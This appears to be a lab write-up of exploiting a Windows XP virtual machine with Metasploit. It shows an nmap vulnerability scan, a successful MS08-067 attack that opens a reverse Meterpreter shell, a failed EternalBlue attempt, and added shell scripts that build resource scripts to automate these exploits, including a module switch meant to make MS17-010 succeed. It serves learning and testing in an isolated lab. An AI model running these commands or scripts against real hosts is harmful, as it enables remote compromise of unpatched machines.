First experience with msf: the MS08-067 vulnerability on XP
Environment:
kali2019: 192.168.1.128
XP, 32-bit: 192.168.1.129
Both VMs use NAT mode
Scanning the target for vulnerabilities
1. nmap scan (use this when you do not know the name of the target's vulnerability). Personally I found it a bit slow; my VM configuration is probably just too weak.
nmap --script=vuln 192.168.1.129
nmap scan report. Two hits: MS08-067 and MS17-010.
Nmap scan report for 192.168.1.129
Host is up (0.00053s latency).
Not shown: 987 closed ports
PORT STATE SERVICE
25/tcp open smtp
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| smtp-vuln-cve2010-4344:
|_ The SMTP server is not Exim: NOT VULNERABLE
|_sslv2-drown:
80/tcp open http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /:
| ASPSESSIONIDSSSATQRD:
|_ httponly flag not set
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /printers/: Potentially interesting folder (401 Access Denied)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
443/tcp open https
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
777/tcp open multiling-http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1025/tcp open NFS-or-IIS
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3389/tcp open ms-wbt-server
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
6002/tcp open X11:2
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7001/tcp open afs3-callback
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
7002/tcp open afs3-prserver
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
31337/tcp open Elite
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:2F:C1:31 (VMware)
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 481.80 seconds
2. msf auxiliary-module scan (checks whether the target has one specific vulnerability). Not every vulnerability has an auxiliary scanner module: this one (MS08-067) does not, although the exploit module's own check command covers that gap (its search entry lists Check: Yes), whereas EternalBlue does have one (auxiliary/scanner/smb/smb_ms17_010).
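Added example, not from the original post: the full --script=vuln sweep above ran every vuln-category script against every open port and took 481.80 seconds, while only the two SMB host scripts mattered for this target. The script below builds a targeted rerun of just those two scripts against port 445 and parses nmap's normal-format report to list the scripts that reported State: VULNERABLE. The target address is the lab's 192.168.1.129, the output file name is my choice, and the sample report embedded in it is constructed from the report above.

```shell
#!/bin/sh
# Added example; not part of the original post and not nmap's own code.
# Two helpers around the scan above: a targeted nmap command that runs only the
# two SMB checks that matter here (the full --script=vuln sweep took 481.80 s),
# and a parser for nmap's normal output that lists which NSE vuln scripts
# reported State: VULNERABLE. The target address 192.168.1.129 is the lab value.

# Print the nmap command line for host $1. -Pn skips host discovery (the box is
# known to be up), -p445 limits the probe to SMB, and -oN saves the report so
# it can be fed to vulnerable_scripts afterwards.
targeted_scan_cmd() {
    printf 'nmap -Pn -p445 --script=smb-vuln-ms08-067,smb-vuln-ms17-010 -oN smb-vuln.txt %s\n' "$1"
}

# Read nmap normal output on stdin; print the name of every NSE script whose
# block contains "State: VULNERABLE" (or "State: LIKELY VULNERABLE"), one per
# line. LC_ALL=C keeps the [a-z] range ASCII-only regardless of locale.
vulnerable_scripts() {
    LC_ALL=C awk '
        # "| smb-vuln-ms08-067:" opens a script block: remember its name.
        # Only lowercase names qualify, so "|   VULNERABLE:" and
        # "|     References:" inside a block are not taken for a new script.
        /^[|]_?[ \t]*[a-z0-9-]+:[ \t]*$/ {
            name = $0
            sub(/^[|]_?[ \t]*/, "", name)
            sub(/:[ \t]*$/, "", name)
            next
        }
        # The verdict line inside the block; "State: NOT VULNERABLE" does not match.
        /State:[ \t]*(LIKELY )?VULNERABLE/ && name != "" {
            print name
            name = ""
        }
    '
}

# Constructed sample: the relevant script blocks from the report above, with
# nmap's usual indentation, plus one NOT VULNERABLE block to show the filter.
sample_report() {
    cat <<'EOF'
PORT    STATE SERVICE
25/tcp  open  smtp
| smtp-vuln-cve2010-4344:
|_  The SMTP server is not Exim: NOT VULNERABLE
445/tcp open  microsoft-ds

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH
EOF
}

# On the Kali box:  targeted_scan_cmd 192.168.1.129 | sh; vulnerable_scripts < smb-vuln.txt
# Offline demonstration on the constructed sample:
sample_report | vulnerable_scripts
```

The parser keys on nmap's text report, which is not a stable interface; outside a lab, save with -oX and parse the XML instead. Picking scripts by name has a second benefit beyond speed: smb-vuln-ms08-067 and smb-vuln-ms17-010 are safe checks, but some scripts in the vuln category (smb-vuln-ms10-054 among them) are also tagged dos and can crash the target's service, which is not what you want a discovery scan to do.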
Exploitation
Launch msfconsole (once inside, type help to see how the various commands are used)
root@kali:~/桌面# msfconsole -q
[-] ***
[-] * WARNING: No database support: No database YAML file
[-] ***
Search for the known vulnerability and use its exploit module
msf5 > search ms08-067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf5 > use 0
Use a reverse TCP payload. In the option tables that follow, every entry marked yes in the Required column must be set before running.
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
RHOSTS is the target IP, LHOST is the listener's (attacker's) IP and LPORT is the port the handler listens on. The module option is named RHOSTS; set rhost is accepted as an alias, as the echo below shows. LHOST must be the Kali address that the target can actually reach (here both VMs sit on the same NAT network), otherwise the reverse connection never arrives.
msf5 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.129
rhost => 192.168.1.129
msf5 exploit(windows/smb/ms08_067_netapi) > set lport 6666
lport => 6666
run or exploit (the two are equivalent) launches the attack
msf5 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.1.128:6666
[*] 192.168.1.129:445 - Automatically detecting the target...
[*] Sending stage (180291 bytes) to 192.168.1.129
[*] Meterpreter session 1 opened (192.168.1.128:6666 -> 192.168.1.129:4310) at 2020-09-07 22:31:14 +0800
[*] Sending stage (180291 bytes) to 192.168.1.1
[*] Meterpreter session 2 opened (192.168.1.128:6666 -> 192.168.1.1:56268) at 2020-09-07 22:31:15 +0800
[*] 192.168.1.129:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.129:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.129:445 - Attempting to trigger the vulnerability...
meterpreter >
Got a shell. This vulnerability is really easy to exploit, but my EternalBlue attempts always fail (the target's firewall is off, yet it has never succeeded, not even to the point of a blue screen). Could some expert take a look?
root@kali:~/桌面# msfconsole -q
[-] ***
[-] * WARNING: No database support: No database YAML file
[-] ***
msf5 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization
3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 > use 3
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.129
rhost => 192.168.1.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.128
lhost => 192.168.1.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.129 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.1.128:4444
[+] 192.168.1.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)
[*] 192.168.1.129:445 - Connecting to target for exploitation.
[+] 192.168.1.129:445 - Connection established for exploitation.
[+] 192.168.1.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.129:445 - CORE raw buffer dump (11 bytes)
[*] 192.168.1.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 Windows 5.1
[+] 192.168.1.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.129:445 - Starting non-paged pool grooming
[+] 192.168.1.129:445 - Sending SMBv2 buffers
[+] 192.168.1.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.129:445 - Sending final SMBv2 buffers.
[*] 192.168.1.129:445 - Sending last fragment of exploit packet!
[*] 192.168.1.129:445 - Receiving response from exploit packet
[+] 192.168.1.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.129:445 - Sending egg to corrupted connection.
[*] 192.168.1.129:445 - Triggering free of corrupted buffer.
[-] 192.168.1.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.129:445 - Connecting to target for exploitation.
[+] 192.168.1.129:445 - Connection established for exploitation.
[+] 192.168.1.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.129:445 - CORE raw buffer dump (11 bytes)
[*] 192.168.1.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 Windows 5.1
[+] 192.168.1.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.129:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.1.129:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.129:445 - Starting non-paged pool grooming
[+] 192.168.1.129:445 - Sending SMBv2 buffers
[+] 192.168.1.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.129:445 - Sending final SMBv2 buffers.
[*] 192.168.1.129:445 - Sending last fragment of exploit packet!
[*] 192.168.1.129:445 - Receiving response from exploit packet
[+] 192.168.1.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.129:445 - Sending egg to corrupted connection.
[*] 192.168.1.129:445 - Triggering free of corrupted buffer.
[-] 192.168.1.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.129:445 - Connecting to target for exploitation.
[+] 192.168.1.129:445 - Connection established for exploitation.
[+] 192.168.1.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.129:445 - CORE raw buffer dump (11 bytes)
[*] 192.168.1.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 Windows 5.1
[+] 192.168.1.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.129:445 - Trying exploit with 22 Groom Allocations.
[*] 192.168.1.129:445 - Sending all but last fragment of exploit packet
[-] 192.168.1.129:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) >
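Added example, serving both the MS08-067 run and the failed MS17-010 run above; it is my code, not the author's and not part of Metasploit. It turns each run into a resource script that runs the module's check before exploiting, and it reads msfconsole output to flag sessions whose peer is not the target: the MS08-067 run above got a second session from 192.168.1.1, which is not the XP box, because a reverse_tcp handler accepts whatever connects to it. For MS17-010 it uses what the console output itself reports: the fingerprint was "Windows 5.1 x86 (32-bit)", while ms17_010_eternalblue's only target is "Windows 7 and Server 2008 R2 (x64)" and an x64 payload was selected, so the script switches to exploit/windows/smb/ms17_010_psexec from the same search results and a 32-bit payload. Assumed values: the lab addresses, LPORT 6666, the /tmp file path, and the NAMEDPIPE option name (check show options on your copy).

```shell
#!/bin/sh
# Added example; not code from the original post or from Metasploit. It serves
# both console runs above: rc_for turns a run into a resource script that checks
# before it exploits, and session_origins reads msfconsole output and flags any
# session whose peer is not the target (the MS08-067 run got a second session
# from 192.168.1.1, which is not the XP box: a reverse_tcp handler accepts
# whatever connects to it). Lab values assumed: attacker 192.168.1.128,
# target 192.168.1.129, LPORT 6666.

# rc_for MODULE PAYLOAD NAME=VALUE... : print a Metasploit resource script.
# "exploit -z" keeps the console instead of dropping into the new session, so
# the "sessions -l" that follows shows every session the handler accepted.
rc_for() {
    module=$1; payload=$2; shift 2
    printf 'use %s\nset PAYLOAD %s\n' "$module" "$payload"
    for kv in "$@"; do
        printf 'set %s %s\n' "${kv%%=*}" "${kv#*=}"
    done
    printf 'check\nexploit -z\nsessions -l\n'
}

# The MS08-067 run exactly as typed above (RHOSTS, LHOST, LPORT, 32-bit stager).
ms08_067_rc() {
    rc_for exploit/windows/smb/ms08_067_netapi windows/meterpreter/reverse_tcp \
        RHOSTS=192.168.1.129 LHOST=192.168.1.128 LPORT=6666
}

# The MS17-010 run, changed to match what the console output reported: the
# fingerprint was "Windows 5.1 x86 (32-bit)" (XP), yet ms17_010_eternalblue's
# only target is "Windows 7 and Server 2008 R2 (x64)" and an x64 payload was
# selected. The search results also list exploit/windows/smb/ms17_010_psexec
# (EternalRomance/EternalSynergy/EternalChampion), the MS17-010 module written
# to cover XP and Server 2003 as well as later versions; it needs a reachable
# named pipe, and with NAMEDPIPE left unset it probes its built-in pipe list
# (option name as I recall it; confirm with "show options").
ms17_010_psexec_rc() {
    rc_for exploit/windows/smb/ms17_010_psexec windows/meterpreter/reverse_tcp \
        RHOSTS=192.168.1.129 LHOST=192.168.1.128 LPORT=6666
}

# session_origins TARGET_IP : read msfconsole output on stdin and print
# "<id> <peer ip> ok|UNEXPECTED" for every "Meterpreter session N opened" line.
session_origins() {
    LC_ALL=C awk -v target="$1" '
        /Meterpreter session [0-9]+ opened/ {
            id = $4                     # "[*] Meterpreter session 2 opened (..."
            peer = $0
            sub(/.*-> /, "", peer)      # "192.168.1.1:56268) at 2020-..."
            sub(/:.*/, "", peer)        # "192.168.1.1"
            print id, peer, (peer == target ? "ok" : "UNEXPECTED")
        }
    '
}

# Constructed sample: the handler lines from the MS08-067 run above.
sample_console_log() {
    cat <<'EOF'
[*] Started reverse TCP handler on 192.168.1.128:6666
[*] Sending stage (180291 bytes) to 192.168.1.129
[*] Meterpreter session 1 opened (192.168.1.128:6666 -> 192.168.1.129:4310) at 2020-09-07 22:31:14 +0800
[*] Sending stage (180291 bytes) to 192.168.1.1
[*] Meterpreter session 2 opened (192.168.1.128:6666 -> 192.168.1.1:56268) at 2020-09-07 22:31:15 +0800
EOF
}

# run_rc FUNCTION : write that function's script to a file and hand it to
# msfconsole. Only useful on the Kali box; the helpers above need nothing.
run_rc() {
    command -v msfconsole >/dev/null 2>&1 || { echo "msfconsole not found" >&2; return 1; }
    "$1" > "/tmp/$1.rc"
    msfconsole -q -r "/tmp/$1.rc"
}

# Offline demonstration: which of the two sessions really came from the target?
sample_console_log | session_origins 192.168.1.129
```

On the Kali box, run_rc ms17_010_psexec_rc writes the script and starts it; the check line makes the module confirm the host looks vulnerable before anything is sent, and sessions -l afterwards shows the peer address of every session, so an unexpected peer such as 192.168.1.1 is visible before you start typing into the wrong shell. A session that did not come from the target should be killed (sessions -k N) and its origin explained before the run is written up as a success.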